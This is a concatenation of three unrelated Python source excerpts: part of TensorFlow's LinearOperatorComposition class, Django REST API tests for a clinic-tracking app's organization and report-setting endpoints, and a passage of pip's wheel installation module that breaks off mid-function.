# Create a [2, 3] batch of 5 x 6 linear operators.
matrix_56 = tf.random_normal(shape=[2, 3, 5, 6])
operator_56 = LinearOperatorFullMatrix(matrix_56)
# Compose to create a [2, 3] batch of 4 x 6 operators.
operator_46 = LinearOperatorComposition([operator_45, operator_56])
# Create a shape [2, 3, 6, 2] vector.
x = tf.random_normal(shape=[2, 3, 6, 2])
operator.matmul(x)
==> Shape [2, 3, 4, 2] Tensor
```
#### Performance
The performance of `LinearOperatorComposition` on any operation is equal to
the sum of the individual operators' operations.
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite, square`.
These have the following meaning:
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
operators,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
is_square=None,
name=None):
r"""Initialize a `LinearOperatorComposition`.
`LinearOperatorComposition` is initialized with a list of operators
`[op_1,...,op_J]`. For the `matmul` method to be well defined, the
composition `op_i.matmul(op_{i+1}(x))` must be defined. Other methods have
similar constraints.
Args:
operators: Iterable of `LinearOperator` objects, each with
the same `dtype` and composable shape.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose.
is_positive_definite: Expect that this operator is positive definite,
meaning the quadratic form `x^H A x` has positive real part for all
nonzero `x`. Note that we do not require the operator to be
self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix\
#Extension_for_non_symmetric_matrices
is_square: Expect that this operator acts like square [batch] matrices.
name: A name for this `LinearOperator`. Default is the individual
operators names joined with `_o_`.
Raises:
TypeError: If all operators do not have the same `dtype`.
ValueError: If `operators` is empty.
"""
# Validate operators.
check_ops.assert_proper_iterable(operators)
operators = list(operators)
if not operators:
raise ValueError(
"Expected a non-empty list of operators. Found: %s" % operators)
self._operators = operators
# Validate dtype.
dtype = operators[0].dtype
for operator in operators:
if operator.dtype != dtype:
name_type = (str((o.name, o.dtype)) for o in operators)
raise TypeError(
"Expected all operators to have the same dtype. Found %s"
% " ".join(name_type))
# Auto-set and check hints.
if all(operator.is_non_singular for operator in operators):
if is_non_singular is False:
raise ValueError(
"The composition of non-singular operators is always non-singular.")
is_non_singular = True
# Initialization.
graph_parents = []
for operator in operators:
graph_parents.extend(operator.graph_parents)
if name is None:
name = "_o_".join(operator.name for operator in operators)
with ops.name_scope(name, values=graph_parents):
super(LinearOperatorComposition, self).__init__(
dtype=dtype,
graph_parents=graph_parents,
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=is_square,
name=name)
@property
def operators(self):
return self._operators
def _shape(self):
# Get final matrix shape.
domain_dimension = self.operators[0].domain_dimension
for operator in self.operators[1:]:
domain_dimension.assert_is_compatible_with(operator.range_dimension)
domain_dimension = operator.domain_dimension
matrix_shape = tensor_shape.TensorShape(
[self.operators[0].range_dimension,
self.operators[-1].domain_dimension])
# Get broadcast batch shape.
# broadcast_shape checks for compatibility.
batch_shape = self.operators[0].batch_shape
for operator in self.operators[1:]:
batch_shape = common_shapes.broadcast_shape(
batch_shape, operator.batch_shape)
return batch_shape.concatenate(matrix_shape)
def _shape_tensor(self):
# Avoid messy broadcasting if possible.
if self.shape.is_fully_defined():
return ops.convert_to_tensor(
self.shape.as_list(), dtype=dtypes.int32, name="shape")
# Don't check the matrix dimensions. That would add unnecessary Asserts to
# the graph. Things will fail at runtime naturally if shapes are
# incompatible.
matrix_shape = array_ops.stack([
self.operators[0].range_dimension_tensor(),
self.operators[-1].domain_dimension_tensor()
])
# Dummy Tensor of zeros. Will never be materialized.
zeros = array_ops.zeros(shape=self.operators[0].batch_shape_tensor())
for operator in self.operators[1:]:
zeros += array_ops.zeros(shape=operator.batch_shape_tensor())
batch_shape = array_ops.shape(zeros)
return array_ops.concat((batch_shape, matrix_shape), 0)
def _matmul(self, x, adjoint=False, adjoint_arg=False):
# If self.operators = [A, B], and not adjoint, then
# matmul_order_list = [B, A].
# As a result, we return A.matmul(B.matmul(x))
if adjoint:
matmul_order_list = self.operators
else:
matmul_order_list = list(reversed(self.operators))
result = matmul_order_list[0].matmul(
x, adjoint=adjoint, adjoint_arg=adjoint_arg)
for operator in matmul_order_list[1:]:
result = operator.matmul(result, adjoint=adjoint)
return result
def _determinant(self):
result = self.operators[0].determinant()
for operator in self.operators[1:]:
result *= operator.determinant()
return result
def _log_abs_determinant(self):
result = self.operators[0].log_abs_determinant()
for operator in self.operators[1:]:
result += operator.log_abs_determinant()
return result
def _solve(self, rhs, adjoint=False, adjoint_arg=False):
# TODO(langmore) Implement solve using solve_ls if some intermediate
# operator maps to a high dimensional space.
# In that case, an exact solve may still be possible.
# If self.operators = [A, B], and not adjoint, then
# solve_order_list = [A, B].
# As a result, we return B.solve(A.solve(x))
if adjoint:
solve_order_list = list(reversed(self.operators))
else:
solve_order_list = self.operators
solution = solve_order_list[0].solve(
rhs, adjoint=adjoint, adjoint_arg=adjoint_arg)
for operator in solve_order_list[1:]:
solution = operator.solve(solution, adjoint=adjoint)
return solution
def _add_to_tensor(self, x):
return self.to_dense() + x
|
|
from django.core.urlresolvers import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from django.contrib.auth.models import User
from tracking.models import Organization, Clinic, ClinicUser, \
ReferringEntity, ReferringReportSetting, ClinicReportSetting
class LoginBaseTest(APITestCase):
''' a base class for rest testcases which need login '''
def setUp(self):
'''initial default user to be login in '''
self.default_pass = 'pass1234'
self.user = User.objects.create_superuser(username='user1',
email='user1@email.com',
password=self.default_pass)
self.clinic = Clinic.objects.create(clinic_name="clinic1")
self.clinic_user = ClinicUser.objects.create(
clinic=self.clinic,
user=self.user)
def _login(self):
''' do login on client '''
return self.client.login(username=self.user.username,
password=self.default_pass)
class OrganizationTest(LoginBaseTest):
''' testcases class for Organization Rest api '''
def test_add(self):
''' add api test '''
self._login()
url = reverse('rest_api:organization-list')
data = {'org_name': 'org1', 'clinic': self.clinic.id}
self.assertEqual(Organization.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Organization.objects.count(), 1)
self.assertEqual(Organization.objects.get().org_name, 'org1')
def test_add_not_authorized(self):
''' call add api while not authorized '''
url = reverse('rest_api:organization-list')
data = {'org_name': 'org1', 'clinic': self.clinic.id}
self.assertEqual(Organization.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(Organization.objects.count(), 0)
def test_get(self):
''' get api test '''
self._login()
org1 = Organization.objects.create(org_name='org1', clinic=self.clinic)
url = reverse('rest_api:organization-detail', args=(org1.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['org_name'], 'org1')
def test_get_not_authorized(self):
''' call get api while not authorized '''
org1 = Organization.objects.create(org_name='org1', clinic=self.clinic)
url = reverse('rest_api:organization-detail', args=(org1.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_update(self):
''' update api test '''
self._login()
org1 = Organization.objects.create(org_name='org1', clinic=self.clinic)
url = reverse('rest_api:organization-detail', args=(org1.id,))
data = {'org_name': 'org2'}
response = self.client.patch(url, data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Organization.objects.count(), 1)
org1 = Organization.objects.get(id=org1.id)
self.assertEqual(org1.org_name, 'org2')
def test_update_not_authorized(self):
''' call update api while not authorized '''
org1 = Organization.objects.create(org_name='org1', clinic=self.clinic)
url = reverse('rest_api:organization-detail', args=(org1.id,))
data = {'org_name': 'org2'}
response = self.client.patch(url, data)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_list(self):
''' list api test '''
orgs = [Organization.objects.create(org_name='org{0}'.format(i),
clinic=self.clinic)
for i in range(5)]
self._login()
url = reverse('rest_api:organization-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
results = response.data['results']
self.assertEqual(len(results), len(orgs))
def test_list_not_authorized(self):
''' call list api while not authorized '''
url = reverse('rest_api:organization-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class ReferringReportSettingTest(LoginBaseTest):
''' testcases class for Organization Rest api '''
def test_add(self):
''' add api test '''
self._login()
url = reverse('rest_api:referringreportsetting-list')
organization = Organization.objects.create(
org_name='org1',
clinic_id=self.clinic.id)
referring_entity = ReferringEntity.objects.create(
entity_name='phys1', organization_id=organization.id)
data = {'enabled': True,
'period': ReferringReportSetting.PERIOD_DAILY,
'report_name': 'thankyou',
'referring_entity': referring_entity.id}
self.assertEqual(ReferringReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(ReferringReportSetting.objects.count(), 1)
rs = ReferringReportSetting.objects.get()
self.assertEqual(rs.enabled, True)
self.assertEqual(rs.period, ReferringReportSetting.PERIOD_DAILY)
self.assertEqual(rs.report_name, 'thankyou')
self.assertEqual(rs.referring_entity, referring_entity)
def test_add_invalid(self):
''' add api test '''
self._login()
url = reverse('rest_api:referringreportsetting-list')
organization = Organization.objects.create(
org_name='org1',
clinic_id=self.clinic.id)
referring_entity = ReferringEntity.objects.create(
entity_name='phys1', organization_id=organization.id)
data = {'enabled': True,
'period': 'Invalid',
'report_name': 'thankyou',
'referring_entity': referring_entity.id}
self.assertEqual(ReferringReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_add_bulk(self):
''' add api test '''
self._login()
url = reverse('rest_api:referringreportsetting-list')
organization = Organization.objects.create(
org_name='org1',
clinic_id=self.clinic.id)
ref1 = ReferringEntity.objects.create(
entity_name='phys1', organization_id=organization.id,
clinic_id=self.clinic.id)
ref2 = ReferringEntity.objects.create(
entity_name='phys2', organization_id=organization.id,
clinic_id=self.clinic.id)
data = {'enabled': True,
'period': ReferringReportSetting.PERIOD_DAILY,
'report_name': 'thankyou',
'referring_entity': '*',
'bulk': True}
self.assertEqual(ReferringReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(ReferringReportSetting.objects.count(), 2)
rs = ReferringReportSetting.objects.all()
self.assertSetEqual({r.referring_entity.id for r in rs},
{ref1.id, ref2.id})
class ClinicReportSettingTest(LoginBaseTest):
''' testcases class for Organization Rest api '''
def test_add(self):
''' add api test '''
self._login()
url = reverse('rest_api:clinicreportsetting-list')
data = {'enabled': True,
'period': ClinicReportSetting.PERIOD_DAILY,
'report_name': 'visit_history',
'clinic_user': self.clinic_user.id}
self.assertEqual(ClinicReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(ClinicReportSetting.objects.count(), 1)
rs = ClinicReportSetting.objects.get()
self.assertEqual(rs.enabled, True)
self.assertEqual(rs.period, ClinicReportSetting.PERIOD_DAILY)
self.assertEqual(rs.report_name, 'visit_history')
self.assertEqual(rs.clinic_user, self.clinic_user)
def test_add_invalid(self):
''' add api test '''
self._login()
url = reverse('rest_api:clinicreportsetting-list')
data = {'enabled': True,
'period': 'Invalid',
'report_name': 'visit_history',
'clinic_user': self.clinic_user.id}
self.assertEqual(ClinicReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_add_bulk(self):
''' add api test '''
self._login()
url = reverse('rest_api:clinicreportsetting-list')
user2 = User.objects.create_user(username='user2',
email='user1@email.com',
password=self.default_pass)
clinic_user2 = ClinicUser.objects.create(
clinic=self.clinic,
user=user2)
data = {'enabled': True,
'period': ClinicReportSetting.PERIOD_DAILY,
'report_name': 'visit_history',
'clinic_user': '*',
'bulk': True}
self.assertEqual(ClinicReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(ClinicReportSetting.objects.count(), 2)
rs = ClinicReportSetting.objects.all()
self.assertSetEqual({r.clinic_user.id for r in rs},
{self.clinic_user.id, clinic_user2.id})
|
|
"""
Support for installing and building the "wheel" binary package format.
"""
from __future__ import absolute_import
import collections
import compileall
import csv
import hashlib
import logging
import os.path
import re
import shutil
import stat
import sys
import warnings
from base64 import urlsafe_b64encode
from email.parser import Parser
from pip._vendor import pkg_resources
from pip._vendor.distlib.scripts import ScriptMaker
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.six import StringIO
from pip._internal import pep425tags
from pip._internal.download import path_to_url, unpack_url
from pip._internal.exceptions import (
InstallationError, InvalidWheelFilename, UnsupportedWheel,
)
from pip._internal.locations import (
PIP_DELETE_MARKER_FILENAME, distutils_scheme,
)
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
call_subprocess, captured_stdout, ensure_dir, read_chunks,
)
from pip._internal.utils.setuptools_build import SETUPTOOLS_SHIM
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.utils.ui import open_spinner
if MYPY_CHECK_RUNNING:
from typing import Dict, List, Optional # noqa: F401
wheel_ext = '.whl'
VERSION_COMPATIBLE = (1, 0)
logger = logging.getLogger(__name__)
def rehash(path, blocksize=1 << 20):
"""Return (hash, length) for path using hashlib.sha256()"""
h = hashlib.sha256()
length = 0
with open(path, 'rb') as f:
for block in read_chunks(f, size=blocksize):
length += len(block)
h.update(block)
digest = 'sha256=' + urlsafe_b64encode(
h.digest()
).decode('latin1').rstrip('=')
return (digest, length)
def open_for_csv(name, mode):
if sys.version_info[0] < 3:
nl = {}
bin = 'b'
else:
nl = {'newline': ''}
bin = ''
return open(name, mode + bin, **nl)
def fix_script(path):
"""Replace #!python with #!/path/to/python
Return True if file was changed."""
# XXX RECORD hashes will need to be updated
if os.path.isfile(path):
with open(path, 'rb') as script:
firstline = script.readline()
if not firstline.startswith(b'#!python'):
return False
exename = sys.executable.encode(sys.getfilesystemencoding())
firstline = b'#!' + exename + os.linesep.encode("ascii")
rest = script.read()
with open(path, 'wb') as script:
script.write(firstline)
script.write(rest)
return True
dist_info_re = re.compile(r"""^(?P<namever>(?P<name>.+?)(-(?P<ver>.+?))?)
\.dist-info$""", re.VERBOSE)
def root_is_purelib(name, wheeldir):
"""
Return True if the extracted wheel in wheeldir should go into purelib.
"""
name_folded = name.replace("-", "_")
for item in os.listdir(wheeldir):
match = dist_info_re.match(item)
if match and match.group('name') == name_folded:
with open(os.path.join(wheeldir, item, 'WHEEL')) as wheel:
for line in wheel:
line = line.lower().rstrip()
if line == "root-is-purelib: true":
return True
return False
def get_entrypoints(filename):
if not os.path.exists(filename):
return {}, {}
# This is done because you can pass a string to entry_points wrappers which
# means that they may or may not be valid INI files. The attempt here is to
# strip leading and trailing whitespace in order to make them valid INI
# files.
with open(filename) as fp:
data = StringIO()
for line in fp:
data.write(line.strip())
data.write("\n")
data.seek(0)
# get the entry points and then the script names
entry_points = pkg_resources.EntryPoint.parse_map(data)
console = entry_points.get('console_scripts', {})
gui = entry_points.get('gui_scripts', {})
def _split_ep(s):
"""get the string representation of EntryPoint, remove space and split
on '='"""
return str(s).replace(" ", "").split("=")
# convert the EntryPoint objects into strings with module:function
console = dict(_split_ep(v) for v in console.values())
gui = dict(_split_ep(v) for v in gui.values())
return console, gui
def message_about_scripts_not_on_PATH(scripts):
# type: (List[str]) -> Optional[str]
"""Determine if any scripts are not on PATH and format a warning.
Returns a warning message if one or more scripts are not on PATH,
otherwise None.
"""
if not scripts:
return None
# Group scripts by the path they were installed in
grouped_by_dir = collections.defaultdict(set) # type: Dict[str, set]
for destfile in scripts:
parent_dir = os.path.dirname(destfile)
script_name = os.path.basename(destfile)
grouped_by_dir[parent_dir].add(script_name)
# We don't want to warn for directories that are on PATH.
not_warn_dirs = [
os.path.normcase(i).rstrip(os.sep) for i in
os.environ["PATH"].split(os.pathsep)
]
# If an executable sits with sys.executable, we don't warn for it.
# This covers the case of venv invocations without activating the venv.
not_warn_dirs.append(os.path.normcase(os.path.dirname(sys.executable)))
warn_for = {
parent_dir: scripts for parent_dir, scripts in grouped_by_dir.items()
if os.path.normcase(parent_dir) not in not_warn_dirs
}
if not warn_for:
return None
# Format a message
msg_lines = []
for parent_dir, scripts in warn_for.items():
scripts = sorted(scripts)
if len(scripts) == 1:
start_text = "script {} is".format(scripts[0])
else:
start_text = "scripts {} are".format(
", ".join(scripts[:-1]) + " and " + scripts[-1]
)
msg_lines.append(
"The {} installed in '{}' which is not on PATH."
.format(start_text, parent_dir)
)
last_line_fmt = (
"Consider adding {} to PATH or, if you prefer "
"to suppress this warning, use --no-warn-script-location."
)
if len(msg_lines) == 1:
msg_lines.append(last_line_fmt.format("this directory"))
else:
msg_lines.append(last_line_fmt.format("these directories"))
# Returns the formatted multiline message
return "\n".join(msg_lines)
def move_wheel_files(name, req, wheeldir, user=False, home=None, root=None,
pycompile=True, scheme=None, isolated=False, prefix=None,
warn_script_location=True):
"""Install a wheel"""
if not scheme:
scheme = distutils_scheme(
name, user=user, home=home, root=root, isolated=isolated,
prefix=prefix,
)
if root_is_purelib(name, wheeldir):
lib_dir = scheme['purelib']
else:
lib_dir = scheme['platlib']
info_dir = []
data_dirs = []
source = wheeldir.rstrip(os.path.sep) + os.path.sep
# Record details of the files moved
# installed = files copied from the wheel to the destination
# changed = files changed while installing (scripts #! line typically)
# generated = files newly generated during the install (script wrappers)
installed = {}
changed = set()
generated = []
# Compile all of the pyc files that we're going to be installing
if pycompile:
with captured_stdout() as stdout:
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
compileall.compile_dir(source, force=True, quiet=True)
logger.debug(stdout.getvalue())
def normpath(src, p):
return os.path.relpath(src, p).replace(os.path.sep, '/')
def record_installed(srcfile, destfile, modified=False):
"""Map archive RECORD paths to installation RECORD paths."""
oldpath = normpath(srcfile, wheeldir)
newpath = normpath(destfile, lib_dir)
installed[oldpath] = newpath
if modified:
changed.add(destfile)
def clobber(source, dest, is_base, fixer=None, filter=None):
ensure_dir(dest) # common for the 'include' path
for dir, subdirs, files in os.walk(source):
basedir = dir[len(source):].lstrip(os.path.sep)
destdir = os.path.join(dest, basedir)
if is_base and basedir.split(os.path.sep, 1)[0].endswith('.data'):
continue
for s in subdirs:
destsubdir = os.path.join(dest, basedir, s)
if is_base and basedir == '' and destsubdir.endswith('.data'):
data_dirs.append(s)
continue
elif (is_base and
s.endswith('.dist-info') and
canonicalize_name(s).startswith(
canonicalize_name(req.name))):
assert not info_dir, ('Multiple .dist-info directories: ' +
destsubdir + ', ' +
', '.join(info_dir))
info_dir.append(destsubdir)
for f in files:
# Skip unwanted files
if filter and filter(f):
continue
srcfile = os.path.join(dir, f)
destfile = os.path.join(dest, basedir, f)
# directory creation is lazy and after the file filtering above
# to ensure we don't install empty dirs; empty dirs can't be
# uninstalled.
ensure_dir(destdir)
# copyfile (called below) truncates the destination if it
# exists and then writes the new contents. This is fine in most
# cases, but can cause a segfault if pip has loaded a shared
# object (e.g. from pyopenssl through its vendored urllib3)
# Since the shared object is mmap'd an attempt to call a
# symbol in it will then cause a segfault. Unlinking the file
# allows writing of new contents while allowing the process to
# continue to use the old copy.
if os.path.exists(destfile):
os.unlink(destfile)
# We use copyfile (not move, copy, or copy2) to be extra sure
# that we are not moving directories over (copyfile fails for
# directories) as well as to ensure that we are not copying
# over any metadata because we want more control over what
# metadata we actually copy over.
shutil.copyfile(srcfile, destfile)
# Copy over the metadata for the file, currently this only
# includes the atime and mtime.
st = os.stat(srcfile)
if hasattr(os, "utime"):
os.utime(destfile, (st.st_atime, st.st_mtime))
# If our file is executable, then make our destination file
# executable.
if os.access(srcfile, os.X_OK):
st = os.stat(srcfile)
permissions = (
st.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
)
os.chmod(destfile, permissions)
changed = False
if fixer:
changed = fixer(destfile)
record_installed(srcfile, destfile, changed)
clobber(source, lib_dir, True)
assert info_dir, "%s .dist-info directory not found" % req
# Get the defined entry points
ep_file = os.path.join(info_dir[0], 'entry_points.txt')
console, gui = get_entrypoints(ep_file)
def is_entrypoint_wrapper(name):
# EP, EP.exe and EP-script.py are scripts generated for
# entry point EP by setuptools
if name.lower().endswith('.exe'):
matchname = name[:-4]
elif name.lower().endswith('-script.py'):
matchname = name[:-10]
elif name.lower().endswith(".pya"):
matchname = name[:-4]
else:
matchname = name
# Ignore setuptools-generated scripts
return (matchname in console or matchname in gui)
for datadir in data_dirs:
fixer = None
filter = None
for subdir in os.listdir(os.path.join(wheeldir, datadir)):
fixer = None
if subdir == 'scripts':
fixer = fix_script
filter = is_entrypoint_wrapper
source = os.path.join(wheeldir, datadir, subdir)
dest = scheme[subdir]
clobber(source, dest, False, fixer=fixer, filter=filter)
maker = ScriptMaker(None, scheme['scripts'])
# Ensure old scripts are overwritten.
# See https://github.com/pypa/pip/issues/1800
maker.clobber = True
# Ensure we don't generate any variants for scripts because this is almost
# never what somebody wants.
# See https://bitbucket.org/pypa/distlib/issue/35/
maker.variants = {''}
# This is required because otherwise distlib creates scripts that are not
# executable.
# See https://bitbucket.org/pypa/distlib/issue/32/
maker.set_mode = True
# Simplify the script and fix the fact that the default script swallows
# every single stack trace.
# See https://bitbucket.org/pypa/distlib/issue/34/
# See https://bitbucket.org/pypa/distlib/issue/33/
def _get_script_text(entry):
if entry.suffix is None:
raise InstallationError(
"Invalid script entry point: %s for req: %s - A callable "
"suffix is required. Cf https://packaging.python.org/en/"
"latest/distributing.html#console-scripts for more "
"information." % (entry, req)
)
return maker.script_template % {
"module": entry.prefix,
"import_name": entry.suffix.split(".")[0],
"func": entry.suffix,
}
maker._get_script_text = _get_script_text
maker.script_template = r"""# -*- coding: utf-8 -*-
import re
import sys
from %(module)s import %(import_name)s
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(%(func)s())
"""
# Special case pip and setuptools to generate versioned wrappers
#
# The issue is that some projects (specifically, pip and setuptools) use
# code in setup.py to create "versioned" entry points - pip2.7 on Python
# 2.7, pip3.3 on Python 3.3, etc. But these entry points are baked into
# the wheel metadata at build time, and so if the wheel is installed with
# a *different* version of Python the entry points will be wrong. The
# correct fix for this is to enhance the metadata to be able to describe
# such versioned entry points, but that won't happen till Metadata 2.0 is
# available.
# In the meantime, projects using versioned entry points will either have
# incorrect versioned entry points, or they will not be able to distribute
# "universal" wheels (i.e., they will need a wheel per Python version).
#
# Because setuptools and pip are bundled with _ensurepip and virtualenv,
# we need to use universal wheels. So, as a stopgap until Metadata 2.0, we
# override the versioned entry points in the wheel and generate the
# correct ones. This code is purely a short-term measure until Metadata 2.0
# is available.
#
# To add the level of hack in this section of code, in order to support
# ensurepip this code will look for an ``ENSUREPIP_OPTIONS`` environment
# variable which will control which version scripts get installed.
#
# ENSUREPIP_OPTIONS=altinstall
# - Only pipX.Y and easy_install-X.Y will be generated and installed
# ENSUREPIP_OPTIONS=install
# - pipX.Y, pipX, easy_install-X.Y will be generated and installed. Note
# that this option is technically if ENSUREPIP_OPTIONS is set and is
# not altinstall
# DEFAULT
# - The default behavior is to install pip, pipX, pipX.Y, easy_install
# and easy_install-X.Y.
pip_script = console.pop('pip', None)
if pip_script:
if "ENSUREPIP_OPTIONS" not in os.environ:
spec = 'pip = ' + pip_script
generated.extend(maker.make(spec))
if os.environ.get("ENSUREPIP_OPTIONS", "") != "altinstall":
spec = 'pip%s = %s' % (sys.version[:1], pip_script)
generated.extend(maker.make(spec))
spec = 'pip%s = %s' % (sys.version[:3], pip_script)
generated.extend(maker.make(spec))
# Delete any other versioned pip entry points
pip_ep = [k for k in console if re.match(r'pip(\d(\.\d)?)?$', k)]
for k in pip_ep:
del console[k]
easy_install_script = console.pop('easy_install', None)
if easy_install_script:
if "ENSUREPIP_OPTIONS" not in os.environ:
spec = 'easy_install = ' + easy_install_script
generated.extend(maker.make(spec))
spec = 'easy_install-%s = %s' % (sys.version[:3], easy_install_script)
generated.extend(maker.make(spec))
# Delete any other versioned easy_install entry points
easy_install_ep = [
k for k in console if re.match(r'easy_install(-\d\.\d)?$', k)
]
for k in easy_install_ep:
del console[k]
# Generate the console and GUI entry points specified in the wheel
if len(console) > 0:
generated_console_scripts = maker.make_multiple(
['%s = %s' % kv for kv in console.items()]
)
generated.extend(generated_console_scripts)
if warn_script_location:
msg = message_about_scripts_not_on_PATH(generated_console_scripts)
if msg is not None:
logger.warn(msg)
if len(gui) > 0:
generated.extend(
maker.make_multiple(
['%s = %s' % kv for kv in gui.items()],
{'gui': True}
)
)
# Record pip as the installer
installer = os.path.join(info_dir[0], 'INSTALLER')
temp_installer = os.path.join(info_dir[0], 'INSTALLER.pip')
with open(temp_installer, 'wb') as installer_file:
installer_file.write(b'pip\n')
shutil.move(temp_installer, installer)
generated.append(installer)
# Record details of all files installed
record = os.path.join(info_dir[0], 'RECORD')
temp_record = os.path.join(info_dir[0], 'RECORD.pip')
with open_for_csv(record, 'r') as record_in:
with open_for_csv(temp_record, 'w+') as record_out:
reader = csv.reader(record_in)
writer = csv.writer(record_out)
for row in reader:
row[0] = installed.pop(row[0], row[0])
if row[0] in changed:
row[1], row[2] = rehash(row[0])
writer.writerow(row)
for f in generated:
h, l = rehash(f)
writer.writerow((normpath(f, lib_dir), h, l))
for f in installed:
writer.writerow((installed[f], '', ''))
shutil.move(temp_record, record)
def wheel_version(source_dir):
"""
Return the Wheel-Version of an extracted wheel, if possible.
Otherwise, return False if we couldn't parse / extract it.
"""
try:
dist = [d for d in pkg_resources.find_on_path(None, source_dir)][0]
wheel_data = dist.get_metadata('WHEEL')
wheel_data = Parser().parsestr(wheel_data)
version = wheel_data['Wheel-Version'].strip()
version = tuple(map(int, version.split('.')))
return version
except:
return False
def check_compatibility(version, name):
"""
Raises errors or warns if called with an incompatible Wheel-Version.
Pip should refuse to install a Wheel-Version that's a major series
ahead of what it's compatible with (e.g 2.0 > 1.1); and warn when
installing a version only minor version ahead (e.g 1.2 > 1.1).
version: a 2-tuple representing a Wheel-Version (Major, Minor)
name: name of wheel or package to raise exception about
:raises UnsupportedWheel: when an incompatible Wheel-Version is given
"""
if not version:
raise UnsupportedWheel(
"%s is in an unsupported or invalid wheel" % name
)
if version[0] > VERSION_COMPATIBLE[0]:
raise UnsupportedWheel(
"%s's Wheel-Version (%s) is not compatible with this version "
"of pip" % (name, '.'.join(map(str, version)))
)
elif version > VERSION_COMPATIBLE:
logger.warning(
'Installing from a newer Wheel-Version (%s)',
'.'.join(map(str, version)),
)
class Wheel(object):
"""A wheel file"""
# TODO: maybe move the install code into this class
wheel_file_re = re.compile(
r"""^(?P<namever>(?P<name>.+?)-(?P<ver>.*?))
((-(?P<build>\d[^-]*?))?-(?P<pyver>.+?)-(?P<abi>.+?)-(?P<plat>.+?)
\.whl|\.dist-info)$""",
re.VERBOSE
)
def __init__(self, filename):
"""
:raises InvalidWheelFilename: when the filename is invalid for a wheel
"""
wheel_info = self.wheel_file_re.match(filename)
if not wheel_info:
raise InvalidWheelFilename(
"%s is not a valid wheel filename." % filename
)
self.filename = filename
self.name = wheel_info.group('name').replace('_', '-')
# we'll assume "_" means "-" due to wheel naming scheme
# (https://github.com/pypa/pip/issues/1150)
self.version = wheel_info.group('ver').replace('_', '-')
self.build_tag = wheel_info.group('build')
self.pyversions = wheel_info.group('pyver').split('.')
self.abis = wheel_info.group('abi').split('.')
self.plats = wheel_info.group('plat').split('.')
# All the tag combinations from this file
self.file_tags = {
(x, y, z) for x in self.pyversions
for y in self.abis for z in self.plats
}
def support_index_min(self, tags=None):
"""
Return the lowest index that one of the wheel's file_tag combinations
achieves in the supported_tags list e.g. if there are 8 supported tags,
and one of the file tags is first in the list, then return 0. Returns
None is the wheel is not supported.
"""
if tags is None: # for mock
tags = pep425tags.get_supported()
indexes = [tags.index(c) for c in self.file_tags if c in tags]
return min(indexes) if indexes else None
def supported(self, tags=None):
"""Is this wheel supported on this system?"""
if tags is None: # for mock
tags = pep425tags.get_supported()
return bool(set(tags).intersection(self.file_tags))
class WheelBuilder(object):
"""Build wheels from a RequirementSet."""
def __init__(self, finder, preparer, wheel_cache,
build_options=None, global_options=None, no_clean=False):
self.finder = finder
self.preparer = preparer
self.wheel_cache = wheel_cache
self._wheel_dir = preparer.wheel_download_dir
self.build_options = build_options or []
self.global_options = global_options or []
self.no_clean = no_clean
def _build_one(self, req, output_dir, python_tag=None):
"""Build one wheel.
:return: The filename of the built wheel, or None if the build failed.
"""
# Install build deps into temporary directory (PEP 518)
with req.build_env:
return self._build_one_inside_env(req, output_dir,
python_tag=python_tag)
def _build_one_inside_env(self, req, output_dir, python_tag=None):
with TempDirectory(kind="wheel") as temp_dir:
if self.__build_one(req, temp_dir.path, python_tag=python_tag):
try:
wheel_name = os.listdir(temp_dir.path)[0]
wheel_path = os.path.join(output_dir, wheel_name)
shutil.move(
os.path.join(temp_dir.path, wheel_name), wheel_path
)
logger.info('Stored in directory: %s', output_dir)
return wheel_path
except:
pass
# Ignore return, we can't do anything else useful.
self._clean_one(req)
return None
def _base_setup_args(self, req):
# NOTE: Eventually, we'd want to also -S to the flags here, when we're
# isolating. Currently, it breaks Python in virtualenvs, because it
# relies on site.py to find parts of the standard library outside the
# virtualenv.
return [
sys.executable, '-u', '-c',
SETUPTOOLS_SHIM % req.setup_py
